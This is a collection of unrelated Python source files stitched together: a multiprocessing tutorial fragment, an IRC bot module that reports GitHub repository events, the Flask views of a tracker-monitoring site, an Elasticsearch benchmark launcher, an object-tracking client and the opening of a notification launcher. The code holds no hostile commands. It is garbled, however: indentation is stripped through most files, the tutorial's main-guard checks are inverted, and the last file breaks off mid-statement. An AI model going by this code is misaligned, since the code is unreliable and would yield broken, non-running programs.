print('Task %s runs %0.2f seconds.' % (name, (end - start)))
if __name__ != '__main__':
print('Parent process %s.' % os.getpid())
    # Create several child processes
    # Pool is the pool factory
    # Pool(processes=None, initializer=None, initargs=(), maxtasksperchild=None)
p = Pool(2)
for i in range(1):
p.apply_async(long_time_task, args=(i,))
print('waiting for all subprocesses done...')
    # close() stops the pool from accepting new tasks
p.close()
    # join() waits for all child processes to finish; commonly used to synchronize processes
p.join()
print('All subprocesses done.')
# Launch an external program as a child process
# using the subprocess module
import subprocess
if __name__ != '__main__':
print('$ nslookup www.python.org')
r = subprocess.call(['nslookup', 'www.python.org'])
print('Exit code:', r)
# Inter-process communication
# Exchange data through Queue, Pipe, etc.
from multiprocessing import Process, Queue
import os, time, random
# Code executed by the first (writer) process
def writeq(q):
print('Process to write: %s' % os.getpid())
for value in ['A', 'B', 'C']:
print('Put %s to queue...' % value)
q.put(value)
time.sleep(random.random())
# Code executed by the second (reader) process
def readq(q):
print('Process to read %s' % os.getpid())
while True:
value = q.get(True)
print('Get %s from queue.' % value)
if __name__ == '__main__':
    # The parent process creates the queue
q = Queue()
pw = Process(target=writeq, args=(q,))
#pr = Process(target=readq, args=(q,))
    # Start the writer process first
pw.start()
    # Then start the reader process
#pr.start()
    # Wait for pw to finish
#pw.join()
    # Forcefully terminate pr
#pr.terminate()
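
# Illustrative sketch (kept in a function so nothing runs on import): the commented-out
# lines above describe the intended flow -- start the writer, start the reader, wait for
# the writer to finish, then terminate the reader, which otherwise blocks on q.get() forever.
def run_queue_demo():
    q = Queue()
    pw = Process(target=writeq, args=(q,))
    pr = Process(target=readq, args=(q,))
    pw.start()      # start the writer first
    pr.start()      # then the reader
    pw.join()       # wait until the writer has put all values
    pr.terminate()  # the reader loops forever, so stop it explicitly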
|
github.py
|
from collections import defaultdict
import threading
from .. import BaseResponder
from ..lib import MemoryCache, get_url, parse_command, catch_other
from ...message import Message
from ...signals import on_exception, message_out, config_changed
class APIError(Exception):
pass
class EventParser(object):
"""Converts events downloaded from the API into readable texts."""
def parse_CreateEvent(self, events):
repos = []
branches = []
tags = []
for event in events:
if event['payload']['ref_type'] == 'repository':
repos.append(event['repo']['name'])
if event['payload']['ref_type'] == 'branch':
branches.append(event['payload']['ref'])
            if event['payload']['ref_type'] == 'tag':
                tags.append(event['payload']['ref'])
text = []
if repos:
text.append('created repositories: %s' % ', '.join(repos))
if branches:
text.append('created branches: %s' % ', '.join(branches))
if tags:
text.append('created tags: %s' % ', '.join(tags))
return text
def parse_ForkEvent(self, events):
forks = [e['payload']['forkee']['html_url'] for e in events]
text = 'forked to: %s' % ', '.join(forks)
return [text]
def parse_IssueCommentEvent(self, events):
comments = [e['payload']['comment']['html_url'] for e in events]
text = 'issue comments created: %s' % ', '.join(comments)
return [text]
def parse_IssuesEvent(self, events):
actions = []
for e in events:
actions.append('%s was %s' % (e['payload']['issue']['html_url'], e['payload']['action']))
text = 'issues: %s' % ', '.join(actions)
return [text]
def parse_PullRequestEvent(self, events):
actions = []
for e in events:
actions.append('%s was %s' % (e['payload']['pull_request']['html_url'], e['payload']['action']))
text = 'pull requests: %s' % ', '.join(actions)
return [text]
def parse_PushEvent(self, events):
texts = []
for e in events:
text = '%s commits to %s' % (e['payload']['size'], e['payload']['ref'])
texts.append(text)
return texts
def parse_ReleaseEvent(self, events):
actions = []
for e in events:
actions.append('%s was %s' % (e['payload']['release']['html_url'], e['payload']['action']))
text = 'releases: %s' % ', '.join(actions)
return [text]
def parse_WatchEvent(self, events):
starred_by = [e['actor']['login'] for e in events]
text = 'starred by: %s' % ', '.join(starred_by)
return [text]
def parse(self, event_dict):
"""Call this to convert `event_dict` into a list of human readable
strings.
Event dict should contain events of the same type grouped under one key:
{
            '<event_type>': [ {<event_data>}, ... ]
}
"""
texts = []
for event_type, events in event_dict.items():
f = getattr(self, 'parse_' + event_type, None)
if f is not None:
texts.extend(f(events))
return texts
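
# Illustrative sketch (not part of the original module): parse() expects events of the
# same type grouped under one key. The WatchEvent below is hand-built with made-up values;
# its fields mirror what parse_WatchEvent reads.
def example_parse_watch_event():
    ep = EventParser()
    event_dict = {'WatchEvent': [{'actor': {'login': 'alice'}}]}
    return ep.parse(event_dict)  # -> ['starred by: alice']
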
class GithubAPI(object):
url_root = 'https://api.github.com'
def __init__(self):
self._repo_cache = MemoryCache(default_timeout=600)
self._user_cache = MemoryCache(default_timeout=600)
# { '<owner>/<repo>': id of the last processed event }
self._last_events = {}
self._ep = EventParser()
def _get(self, url, **params):
"""Performs an API GET request.
params: GET request parameters.
"""
url = self.url_root + url
try:
r = get_url(url, params=params)
r.raise_for_status()
return r.json()
except Exception as e:
            raise APIError('API error: %s' % e)
def search_repositories(self, q):
rw = self._repo_cache.get(q)
if rw is None:
rw = self._get('/search/repositories', q=q)
self._repo_cache.set(q, rw)
return rw
def search_users(self, q):
rw = self._user_cache.get(q)
if rw is None:
rw = self._get('/search/users', q=q)
self._user_cache.set(q, rw)
return rw
def get_raw_repo_events(self, owner, repo):
"""Gets the fresh event data directly from the API."""
return self._get('/repos/%s/%s/events' % (owner, repo))
def get_new_repo_events(self, owner, repo):
"""Gets the fresh event data directly from the API, selects only
new ones and puts them in the dictionary."""
key = '%s/%s' % (owner, repo)
last_id = self._last_events.get(key, -1)
highest_id = -1
events = defaultdict(list)
d = self.get_raw_repo_events(owner, repo)
for event in d:
event['id'] = int(event['id'])
highest_id = max(highest_id, event['id'])
if last_id >= 0 and event['id'] > last_id:
events[event['type']].append(event)
self._last_events[key] = highest_id
return events
def get_event_texts(self, owner, repo):
"""Returns a new array with human readable string about events in the
repository which occured since the last call to this function with
the same parameters.
"""
all_events = self.get_new_repo_events(owner, repo)
texts = self._ep.parse(all_events)
return texts
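
# Illustrative sketch (not part of the original module): the Github responder below calls
# get_event_texts periodically, but it can also be called directly. The owner/repo pair is
# only an example; the first call merely records the newest event id and returns nothing.
def example_poll_repo_events():
    api = GithubAPI()
    return api.get_event_texts('boreq', 'botnet')
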
class Github(BaseResponder):
"""Implements Github search and tracks Github repository events.
Example module config:
"botnet": {
"github": {
"track": [
{
"owner": "boreq",
"repo": "botnet",
"channels": ["#botnet-dev"]
}
]
}
}
"""
config_namespace = 'botnet'
config_name = 'github'
api_class = GithubAPI
deltatime = 300
def __init__(self, config):
super(Github, self).__init__(config)
self.api = self.api_class()
def start(self):
super(Github, self).start()
# run the code checking the events in a separate thread
self.stop_event = threading.Event()
self.t = threading.Thread(target=self.run)
self.t.start()
def stop(self):
super(Github, self).stop()
self.stop_event.set()
def run(self):
"""Runs in a separate threads to query the event API periodically."""
while not self.stop_event.is_set():
try:
self.update()
self.stop_event.wait(self.deltatime)
except Exception as e:
on_exception.send(self, e=e)
def update(self):
"""Queries the event API."""
self.logger.debug('Performing event update')
for data in self.config_get('track', []):
try:
# prepare the text
texts = self.api.get_event_texts(data['owner'], data['repo'])
info = 'https://github.com/{owner}/{repo} new events: '.format(
owner=data['owner'],
repo=data['repo']
)
text = info + ' | '.join(texts)
# send the text
if texts:
for channel in data['channels']:
msg = Message(command='PRIVMSG', params=[channel, text])
message_out.send(self, msg=msg)
except Exception as e:
on_exception.send(self, e=e)
@catch_other(APIError, 'API error')
def get_repo(self, phrase):
r = self.api.search_repositories(phrase)
return self.get_first(r)
@catch_other(APIError, 'API error')
def get_user(self, phrase):
r = self.api.search_users(phrase)
return self.get_first(r)
def get_first(self, r):
d = r['items']
if not d:
raise APIError('No results')
return d[0]['html_url']
def in_background(self, f):
"""Launches a function in a separate thread."""
t = threading.Thread(target=f)
t.daemon = True
        t.start()
def config_get_tracking_data(self, owner, repo):
tracked = self.config_get('track', [])
for data in tracked:
if data['owner'] == owner and data['repo'] == repo:
return data
return None
def get_subscription_info_text(self, owner, repo):
d = self.config_get_tracking_data(owner, repo)
if d is not None:
text = 'Channels subscribed to %s/%s: %s' % (owner, repo, ', '.join(d['channels']))
else:
text = '%s/%s is not being tracked' % (owner, repo)
return text
@parse_command([('owner', 1), ('repo', 1), ('channels', '+')], launch_invalid=False)
def admin_command_github_track(self, msg, args):
"""Starts tracking a repo. Events from a tracked repository (such as new
created issues or pushed commits) are sent to the specified channels.
If the repo is already tracked subscribes additional channels to the
updates.
Syntax: github_track OWNER REPO CHANNEL ...
"""
owner = args.owner[0]
repo = args.repo[0]
d = self.config_get_tracking_data(owner, repo)
if d is not None:
for channel in args.channels:
if channel not in d['channels']:
d['channels'].append(channel)
config_changed.send(self)
else:
data = {
'owner': owner,
'repo': repo,
'channels': args.channels
}
self.config_append('track', data)
text = self.get_subscription_info_text(owner, repo)
self.respond(msg, text)
@parse_command([('owner', 1), ('repo', 1), ('channels', '*')], launch_invalid=False)
def admin_command_github_untrack(self, msg, args):
"""Unsubscribes a channel from receiving updates about events occuring
in a repository. If no CHANNELs are passed as an argument all channels
are unsubscribed from the updates and the repository is in effect no
longer tracked.
Syntax: github_untrack OWNER REPO [CHANNEL ...]
"""
owner = args.owner[0]
repo = args.repo[0]
d = self.config_get_tracking_data(owner, repo)
if d is not None:
# remove channels
if not args.channels:
d['channels'] = []
else:
d['channels'] = [c for c in d['channels'] if c not in args.channels]
# remove entire entry if no channels left
if not d['channels']:
self.config_get('track').remove(d)
config_changed.send(self)
# info text
text = 'Channels removed. ' + self.get_subscription_info_text(owner, repo)
self.respond(msg, text)
else:
self.respond(msg, 'This repository is not being tracked')
def admin_command_github_tracked(self, msg):
"""Lists tracked repositories.
Syntax: github_tracked
"""
texts = []
for data in self.config_get('track', []):
texts.append('{owner}/{repo}: {channels}'.format(
owner=data['owner'],
repo=data['repo'],
channels=', '.join(data['channels']))
)
if texts:
text = ' | '.join(texts)
else:
text = 'No tracked repositories'
self.respond(msg, text)
@parse_command([('phrase', '+')], launch_invalid=False)
def command_github(self, msg, args):
"""Search Github repositories.
Syntax: github PHRASE
"""
phrase = ' '.join(args.phrase)
def f():
try:
r = self.get_repo(phrase)
self.respond(msg, r)
except Exception as e:
self.respond(msg, str(e))
self.in_background(f)
@parse_command([('phrase', '+')], launch_invalid=False)
def command_github_user(self, msg, args):
"""Search Github users.
Syntax: github_user PHRASE
"""
phrase = ' '.join(args.phrase)
def f():
try:
r = self.get_user(phrase)
self.respond(msg, r)
except Exception as e:
self.respond(msg, str(e))
self.in_background(f)
mod = Github
|
views.py
|
from logging import FileHandler, getLogger, INFO, Formatter
from threading import Thread
from flask import (
Flask,
send_from_directory,
request,
Response,
redirect,
make_response,
abort,
)
from flask_mako import MakoTemplates, render_template
from werkzeug.routing import BaseConverter
from newTrackon import db, utils, trackon
max_input_length = 1000000
mako = MakoTemplates()
app = Flask(__name__)
app.template_folder = "tpl"
app.config["MAKO_DEFAULT_FILTERS"] = ["h"]
mako.init_app(app)
class RegexConverter(BaseConverter):
def __init__(self, url_map, *items):
super(RegexConverter, self).__init__(url_map)
self.regex = items[0]
app.url_map.converters["regex"] = RegexConverter
logger = getLogger("newtrackon_logger")
logger.setLevel(INFO)
handler = FileHandler("data/trackon.log")
logger_format = Formatter("%(asctime)s - %(message)s")
handler.setFormatter(logger_format)
logger.addHandler(handler)
logger.info("Server started")
@app.route("/")
def main():
trackers_list = db.get_all_data()
trackers_list = utils.format_uptime_and_downtime_time(trackers_list)
return render_template("main.mako", trackers=trackers_list, active="main")
@app.route("/", methods=["POST"])
def new_trackers():
new_ts = request.form.get("new_trackers")
if len(new_ts) > max_input_length:
abort(413)
check_all_trackers = Thread(target=trackon.enqueue_new_trackers, args=(new_ts,))
check_all_trackers.daemon = True
check_all_trackers.start()
return main()
@app.route("/api/add", methods=["POST"])
def new_trackers_api():
new_ts = request.form.get("new_trackers")
if len(new_ts) > max_input_length:
abort(413)
check_all_trackers = Thread(target=trackon.enqueue_new_trackers, args=(new_ts,))
check_all_trackers.daemon = True
check_all_trackers.start()
resp = Response(status=204, headers={"Access-Control-Allow-Origin": "*"})
return resp
@app.route("/submitted")
def submitted():
return render_template(
"submitted.mako",
data=trackon.submitted_data,
size=len(trackon.submitted_trackers),
active="submitted",
)
@app.route("/faq")
def faq():
return render_template("/static/faq.mako", active="faq")
@app.route("/list")
def list_stable():
return render_template("/static/list.mako", active="list")
@app.route("/api")
def api_docs():
return render_template("/static/api-docs.mako", active="api")
@app.route("/raw")
def raw():
return render_template("raw.mako", data=trackon.raw_data, active="raw")
@app.route("/api/<int:percentage>")
def api_percentage(percentage):
    include_ipv6_only = (
        False
        if request.args.get("include_ipv6_only_trackers") in ("False", "0")
        else True
    )
    include_ipv4_only = (
        False
        if request.args.get("include_ipv4_only_trackers") in ("False", "0")
        else True
    )
    if 0 <= percentage <= 100:
        formatted_list = db.get_api_data(
            "percentage", percentage, include_ipv6_only, include_ipv4_only
        )
resp = make_response(formatted_list)
resp = utils.add_api_headers(resp)
return resp
else:
abort(
Response(
"The percentage has to be between 0 an 100",
400,
headers={"Access-Control-Allow-Origin": "*"},
)
)
@app.route("/api/stable")
def api_stable():
return api_percentage(95)
@app.route("/api/best")
def api_best():
return redirect("/api/stable", code=301)
@app.route("/api/all")
def api_all():
return api_percentage(0)
@app.route("/api/live")
@app.route("/api/udp")
@app.route("/api/http")
def api_multiple():
resp = make_response(db.get_api_data(request.path))
resp = utils.add_api_headers(resp)
return resp
@app.route("/about")
def about():
return render_template("/static/about.mako", active="about")
@app.route(
'/<regex(".*(?=\.)"):filename>.<regex("(png|svg|ico)"):filetype>'
) # matches all favicons that should be in root
def favicon(filename, filetype):
return send_from_directory("static/imgs/", filename + "." + filetype)
@app.route(
'/<regex(".*(?=\.)"):filename>.<regex("(xml|json)"):filetype>'
) # matches browserconfig and manifest that should be in root
def app_things(filename, filetype):
return send_from_directory("static/", filename + "." + filetype)
@app.before_request
def reject_announce_requests():
if request.args.get("info_hash"):
return abort(
Response("newTrackon is not a tracker and cannot provide peers", 403)
)
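
# Illustrative sketch (not part of the original module): exercising the percentage API with
# Flask's test client. The query parameter name matches the one parsed in api_percentage above.
def example_api_query():
    with app.test_client() as client:
        return client.get("/api/95?include_ipv6_only_trackers=0")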
|
launcher.py
|
import logging
import os
import signal
import subprocess
import threading
import shlex
from esrally import config, time, exceptions, client
from esrally.mechanic import telemetry, cluster
from esrally.utils import console, process, jvm
logger = logging.getLogger("rally.launcher")
def wait_for_rest_layer(es, max_attempts=10):
for attempt in range(max_attempts):
import elasticsearch
try:
es.info()
return True
except elasticsearch.TransportError as e:
if e.status_code == 503 or isinstance(e, elasticsearch.ConnectionError):
logger.debug("Elasticsearch REST API is not available yet (probably cluster block).")
time.sleep(2)
elif e.status_code == 401:
logger.debug("Could not authenticate yet (probably x-pack initializing).")
time.sleep(2)
else:
raise e
return False
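
# Illustrative sketch (not part of the original module): wait_for_rest_layer is used by the
# launchers below, but it only needs an Elasticsearch client. The host list here is a placeholder.
def example_wait_for_cluster(hosts=None, client_options=None):
    es = client.EsClientFactory(hosts or [{"host": "localhost", "port": 9200}],
                                client_options or {}).create()
    return wait_for_rest_layer(es, max_attempts=20)
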
class ClusterLauncher:
def __init__(self, cfg, metrics_store, client_factory_class=client.EsClientFactory):
self.cfg = cfg
self.metrics_store = metrics_store
self.client_factory = client_factory_class
def start(self):
hosts = self.cfg.opts("client", "hosts")
client_options = self.cfg.opts("client", "options")
es = self.client_factory(hosts, client_options).create()
t = telemetry.Telemetry(devices=[
telemetry.ClusterMetaDataInfo(es),
telemetry.ClusterEnvironmentInfo(es, self.metrics_store),
telemetry.NodeStats(es, self.metrics_store),
telemetry.IndexStats(es, self.metrics_store)
])
# The list of nodes will be populated by ClusterMetaDataInfo, so no need to do it here
c = cluster.Cluster(hosts, [], t)
logger.info("All cluster nodes have successfully started. Checking if REST API is available.")
if wait_for_rest_layer(es, max_attempts=20):
logger.info("REST API is available. Attaching telemetry devices to cluster.")
t.attach_to_cluster(c)
logger.info("Telemetry devices are now attached to the cluster.")
else:
# Just stop the cluster here and raise. The caller is responsible for terminating individual nodes.
logger.error("REST API layer is not yet available. Forcefully terminating cluster.")
self.stop(c)
raise exceptions.LaunchError("Elasticsearch REST API layer is not available. Forcefully terminated cluster.")
return c
def stop(self, c):
c.telemetry.detach_from_cluster(c)
class DockerLauncher:
# May download a Docker image and that can take some time
PROCESS_WAIT_TIMEOUT_SECONDS = 10 * 60
def __init__(self, cfg, metrics_store):
self.cfg = cfg
self.metrics_store = metrics_store
self.binary_paths = {}
self.node_name = None
self.keep_running = self.cfg.opts("mechanic", "keep.running")
def start(self, node_configurations):
nodes = []
for node_configuration in node_configurations:
node_name = node_configuration.node_name
host_name = node_configuration.ip
binary_path = node_configuration.binary_path
self.binary_paths[node_name] = binary_path
p = self._start_process(cmd="docker-compose -f %s up" % binary_path, node_name=node_name, log_dir=node_configuration.log_path)
# only support a subset of telemetry for Docker hosts (specifically, we do not allow users to enable any devices)
node_telemetry = [
telemetry.DiskIo(self.metrics_store, len(node_configurations)),
telemetry.CpuUsage(self.metrics_store),
telemetry.NodeEnvironmentInfo(self.metrics_store)
]
t = telemetry.Telemetry(devices=node_telemetry)
nodes.append(cluster.Node(p, host_name, node_name, t))
return nodes
def _start_process(self, cmd, node_name, log_dir):
startup_event = threading.Event()
p = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.DEVNULL)
t = threading.Thread(target=self._read_output, args=(node_name, p, startup_event))
        t.daemon = True
t.start()
if startup_event.wait(timeout=DockerLauncher.PROCESS_WAIT_TIMEOUT_SECONDS):
logger.info("Started node=%s with pid=%s" % (node_name, p.pid))
return p
else:
msg = "Could not start node '%s' within timeout period of %s seconds." % (
                node_name, DockerLauncher.PROCESS_WAIT_TIMEOUT_SECONDS)
logger.error(msg)
raise exceptions.LaunchError("%s Please check the logs in '%s' for more details." % (msg, log_dir))
def _read_output(self, node_name, server, startup_event):
"""
Reads the output from the ES (node) subprocess.
"""
while True:
l = server.stdout.readline().decode("utf-8")
if len(l) == 0:
break
l = l.rstrip()
if l.find("Initialization Failed") != -1:
logger.warning("[%s] has started with initialization errors." % node_name)
startup_event.set()
# don't log each output line as it is contained in the node's log files anyway and we just risk spamming our own log.
if not startup_event.isSet():
logger.info("%s: %s" % (node_name, l.replace("\n", "\n%s (stdout): " % node_name)))
if l.endswith("] started") and not startup_event.isSet():
startup_event.set()
logger.info("[%s] has successfully started." % node_name)
def stop(self, nodes):
if self.keep_running:
logger.info("Keeping Docker container running.")
else:
logger.info("Stopping Docker container")
for node in nodes:
node.telemetry.detach_from_node(node, running=True)
process.run_subprocess_with_logging("docker-compose -f %s down" % self.binary_paths[node.node_name])
node.telemetry.detach_from_node(node, running=False)
class ExternalLauncher:
def __init__(self, cfg, metrics_store, client_factory_class=client.EsClientFactory):
self.cfg = cfg
self.metrics_store = metrics_store
self.client_factory = client_factory_class
def start(self, node_configurations=None):
hosts = self.cfg.opts("client", "hosts")
client_options = self.cfg.opts("client", "options")
es = self.client_factory(hosts, client_options).create()
# cannot enable custom telemetry devices here
t = telemetry.Telemetry(devices=[
# This is needed to actually populate the nodes
telemetry.ClusterMetaDataInfo(es),
# will gather node specific meta-data for all nodes
telemetry.ExternalEnvironmentInfo(es, self.metrics_store),
])
# We create a pseudo-cluster here to get information about all nodes.
# cluster nodes will be populated by the external environment info telemetry device. We cannot know this upfront.
c = cluster.Cluster(hosts, [], t)
user_defined_version = self.cfg.opts("mechanic", "distribution.version", mandatory=False)
distribution_version = es.info()["version"]["number"]
if not user_defined_version or user_defined_version.strip() == "":
logger.info("Distribution version was not specified by user. Rally-determined version is [%s]" % distribution_version)
self.cfg.add(config.Scope.benchmark, "mechanic", "distribution.version", distribution_version)
elif user_defined_version != distribution_version:
console.warn(
"Specified distribution version '%s' on the command line differs from version '%s' reported by the cluster." %
(user_defined_version, distribution_version), logger=logger)
t.attach_to_cluster(c)
return c.nodes
def stop(self, nodes):
# nothing to do here, externally provisioned clusters / nodes don't have any specific telemetry devices attached.
pass
class InProcessLauncher:
"""
Launcher is responsible for starting and stopping the benchmark candidate.
"""
PROCESS_WAIT_TIMEOUT_SECONDS = 90.0
def __init__(self, cfg, metrics_store, races_root_dir, clock=time.Clock):
self.cfg = cfg
self.metrics_store = metrics_store
self._clock = clock
self.races_root_dir = races_root_dir
self.java_home = self.cfg.opts("runtime", "java.home")
self.keep_running = self.cfg.opts("mechanic", "keep.running")
def start(self, node_configurations):
# we're very specific which nodes we kill as there is potentially also an Elasticsearch based metrics store running on this machine
        # The only specific trait of a Rally-related process is that it is started "somewhere" in the races root directory.
#
# We also do this only once per host otherwise we would kill instances that we've just launched.
process.kill_running_es_instances(self.races_root_dir)
java_major_version = jvm.major_version(self.java_home)
logger.info("Detected Java major version [%s]." % java_major_version)
node_count_on_host = len(node_configurations)
return [self._start_node(node_configuration, node_count_on_host, java_major_version) for node_configuration in node_configurations]
def _start_node(self, node_configuration, node_count_on_host, java_major_version):
host_name = node_configuration.ip
node_name = node_configuration.node_name
car = node_configuration.car
binary_path = node_configuration.binary_path
data_paths = node_configuration.data_paths
node_telemetry_dir = "%s/telemetry" % node_configuration.node_root_path
logger.info("Starting node [%s] based on car [%s]." % (node_name, car))
enabled_devices = self.cfg.opts("mechanic", "telemetry.devices")
node_telemetry = [
telemetry.FlightRecorder(node_telemetry_dir, java_major_version),
telemetry.JitCompiler(node_telemetry_dir),
telemetry.Gc(node_telemetry_dir, java_major_version),
telemetry.PerfStat(node_telemetry_dir),
telemetry.DiskIo(self.metrics_store, node_count_on_host),
telemetry.CpuUsage(self.metrics_store),
telemetry.NodeEnvironmentInfo(self.metrics_store),
telemetry.IndexSize(data_paths, self.metrics_store),
telemetry.MergeParts(self.metrics_store, node_configuration.log_path),
]
t = telemetry.Telemetry(enabled_devices, devices=node_telemetry)
env = self._prepare_env(car, node_name, t)
node_process = self._start_process(env, node_name, binary_path)
node = cluster.Node(node_process, host_name, node_name, t)
logger.info("Node [%s] has successfully started. Attaching telemetry devices." % node_name)
t.attach_to_node(node)
logger.info("Telemetry devices are now attached to node [%s]." % node_name)
return node
def _prepare_env(self, car, node_name, t):
env = {}
env.update(os.environ)
env.update(car.env)
# Unix specific!:
self._set_env(env, "PATH", "%s/bin" % self.java_home, separator=":")
# Don't merge here!
env["JAVA_HOME"] = self.java_home
# we just blindly trust telemetry here...
for k, v in t.instrument_candidate_env(car, node_name).items():
self._set_env(env, k, v)
exit_on_oome_flag = "-XX:+ExitOnOutOfMemoryError"
if jvm.supports_option(self.java_home, exit_on_oome_flag):
logger.info("JVM supports [%s]. Setting this option to detect out of memory errors during the benchmark." % exit_on_oome_flag)
self._set_env(env, "ES_JAVA_OPTS", exit_on_oome_flag)
else:
logger.info("JVM does not support [%s]. Cannot detect out of memory errors. Please consider a JDK upgrade." % exit_on_oome_flag)
logger.info("env for [%s]: %s" % (node_name, str(env)))
return env
def _set_env(self, env, k, v, separator=' '):
if v is not None:
if k not in env:
env[k] = v
else: # merge
env[k] = v + separator + env[k]
def _start_process(self, env, node_name, binary_path):
if os.geteuid() == 0:
raise exceptions.LaunchError("Cannot launch Elasticsearch as root. Please run Rally as a non-root user.")
os.chdir(binary_path)
startup_event = threading.Event()
cmd = ["bin/elasticsearch"]
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.DEVNULL, env=env)
t = threading.Thread(target=self._read_output, args=(node_name, process, startup_event))
        t.daemon = True
t.start()
if startup_event.wait(timeout=InProcessLauncher.PROCESS_WAIT_TIMEOUT_SECONDS):
process.poll()
# has the process terminated?
if process.returncode:
msg = "Node [%s] has terminated with exit code [%s]." % (node_name, str(process.returncode))
logger.error(msg)
raise exceptions.LaunchError(msg)
else:
logger.info("Started node [%s] with PID [%s]" % (node_name, process.pid))
return process
else:
msg = "Could not start node [%s] within timeout period of [%s] seconds." % (
node_name, InProcessLauncher.PROCESS_WAIT_TIMEOUT_SECONDS)
# check if the process has terminated already
process.poll()
if process.returncode:
msg += " The process has already terminated with exit code [%s]." % str(process.returncode)
else:
msg += " The process seems to be still running with PID [%s]." % process.pid
logger.error(msg)
raise exceptions.LaunchError(msg)
def _read_output(self, node_name, server, startup_event):
"""
Reads the output from the ES (node) subprocess.
"""
while True:
l = server.stdout.readline().decode("utf-8")
if len(l) == 0:
# no more output -> the process has terminated. We can give up now
startup_event.set()
break
l = l.rstrip()
# don't log each output line as it is contained in the node's log files anyway and we just risk spamming our own log.
if not startup_event.isSet():
logger.info("%s: %s" % (node_name, l.replace("\n", "\n%s (stdout): " % node_name)))
if l.find("Initialization Failed") != -1 or l.find("A fatal exception has occurred") != -1:
logger.error("[%s] encountered initialization errors." % node_name)
startup_event.set()
if l.endswith("started") and not startup_event.isSet():
startup_event.set()
logger.info("[%s] has successfully started." % node_name)
def stop(self, nodes):
if self.keep_running:
logger.info("Keeping [%d] nodes on this host running." % len(nodes))
else:
logger.info("Shutting down [%d] nodes on this host." % len(nodes))
for node in nodes:
process = node.process
node_name = node.node_name
node.telemetry.detach_from_node(node, running=True)
if not self.keep_running:
stop_watch = self._clock.stop_watch()
stop_watch.start()
os.kill(process.pid, signal.SIGINT)
try:
process.wait(10.0)
logger.info("Done shutdown node [%s] in [%.1f] s." % (node_name, stop_watch.split_time()))
except subprocess.TimeoutExpired:
# kill -9
logger.warning("Node [%s] did not shut down itself after 10 seconds; now kill -QUIT node, to see threads:" % node_name)
try:
os.kill(process.pid, signal.SIGQUIT)
except OSError:
logger.warning("No process found with PID [%s] for node [%s]" % (process.pid, node_name))
break
try:
process.wait(120.0)
logger.info("Done shutdown node [%s] in [%.1f] s." % (node_name, stop_watch.split_time()))
break
except subprocess.TimeoutExpired:
pass
logger.info("kill -KILL node [%s]" % node_name)
try:
process.kill()
except ProcessLookupError:
logger.warning("No process found with PID [%s] for node [%s]" % (process.pid, node_name))
node.telemetry.detach_from_node(node, running=False)
|
tracker-co.py
|
#!/usr/bin/env python
# Tracking related
import dlib, cv2
import numpy as np
# Basic Modules
import os, sys
import argparse
from threading import Thread
from logIO import logCreate
# HTTP related
import requests
# Cloud Server
URL = 'http://yaolaoban.eva0.nics.cc:5000/correlate'
# global varibles
this_file_path = os.path.dirname(os.path.abspath(__file__))
imdb_name = 'Jumping'
imdb_path = os.path.join(this_file_path, 'img', imdb_name)
_, _, files = os.walk(imdb_path).next()
img_count = len(files) - 1
i = 1
# IMG, BOX and status
showimg = False
updated = True
updtbox = [0,0,0,0]
oldbox = [0,0,0,0]
crtbox = [0,0,0,0]
# Tracker
tracker = dlib.correlation_tracker()
def adjust_box(actbox, oldbox, crtbox):
'''input:
1. actbox (Actual Box) : the bbox returned by the server
2. oldbox (Old Box) : the bbox of img sent to server
3. crtbox (Current Box): the bbox now returned by tracker
output:
1. newbox (New Box) : the adjusted bbox
'''
newbox = actbox
newbox[0] += crtbox[0] - oldbox[0]
newbox[1] += crtbox[1] - oldbox[1]
newbox[2] += crtbox[2] - oldbox[2]
newbox[3] += crtbox[3] - oldbox[3]
return newbox
def showIMG(img, box, time=10):
    cv2.rectangle(img, (box[0], box[1]), (box[2], box[3]),
                  (255,255,255), 2)
cv2.imshow('Image', img)
cv2.waitKey(time)
def encode_box(box):
'''encode a box (a list of 4 ints) for posting'''
en_box = {
'L' : box[0],
'U' : box[1],
'R' : box[2],
'B' : box[3]}
return en_box
def postIMG():
global i
global updated
global updtbox, oldbox, crtbox
    f = open(imdb_path+'/%04d.jpg'%i, 'rb')
r = requests.post(url=URL,
data=encode_box(crtbox),
files={'img':f})
updtbox = r.json()['bbox']
updtbox = adjust_box(updtbox, oldbox, crtbox)
updated = True
f.close()
return
def start_tracking():
global updated
global i, img_count
global updtbox, oldbox, crtbox
while i <= img_count:
# get a new frame
img = cv2.imread(imdb_path+'/%04d.jpg'%i)
# update the tracker
if updated:
# tracker.start_track()
tracker.start_track(img,
dlib.rectangle(*updtbox))
oldbox = updtbox
updated = False
# post a new frame
trd_post = Thread(target=postIMG)
trd_post.start()
else:
# tracker.update()
tracker.update(img)
rect = tracker.get_position()
pt1 = [int(rect.left()), int(rect.top())]
pt2 = [int(rect.right()),int(rect.bottom())]
crtbox = pt1 + pt2
f.write(str(crtbox)+'\n')
if i%10 == 0:
print 'frame',i,'returns',crtbox
if showimg:
showIMG(img, crtbox, 2000)
# next frame
i +=1
def init_firstframe_by_detection():
pass
def init_firstframe_by_grdtruth():
global updtbox, oldbox, crtbox
gtfile = open(imdb_path+'/'+'groundtruth_rect.txt','r')
line = gtfile.readline()
points = line[:-1].split(',')
points = map(int, points)
points[2] += points[0]
points[3] += points[1]
gtfile.close()
crtbox = points
updtbox = crtbox
oldbox = crtbox
img = cv2.imread(imdb_path+'/0001.jpg')
tracker.start_track(img, dlib.rectangle(*crtbox))
def parse_args():
'''Parse input arguments.'''
parser = argparse.ArgumentParser(description='Terminal')
parser.add_argument('--local', dest='LOCAL',
help='run on local server',
action='store_true')
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
#if args.LOCAL:
URL = 'http://0.0.0.0:5000/correlate'
print 'Start tracking',imdb_name
f = logCreate()
f.write(imdb_name+'correlate\n')
init_firstframe_by_grdtruth()
start_tracking()
print 'Tracking finished, log file:',f.name
|
NotificationConectaIT.py
|
#!/usr/bin/python3
import os
import sys
import json
import psutil
import subprocess
pid = os.getpid()
for proc in psutil.process_iter(['pid', 'name']):
#jsonDecodeProc = json.loads(proc)
#if(jsonDecodeProc['name'] == 'ConectaIT.exe'):
inf = json.dumps(proc.info)
inf2 = json.loads(inf)
if(inf2['name'] == 'NotificationConectaIT.exe' and inf2['pid'] != pid):
subprocess.call('taskkill /F /PID '+str(inf2['pid']))
from threading import Thread
from modules.NotificationIniciarJornada import *
from modules.NotificationFimJornada import *
dir_path = ""
try:
notificationjornada = Thread(target=NotificationIniciarJornada, args=[dir_path])
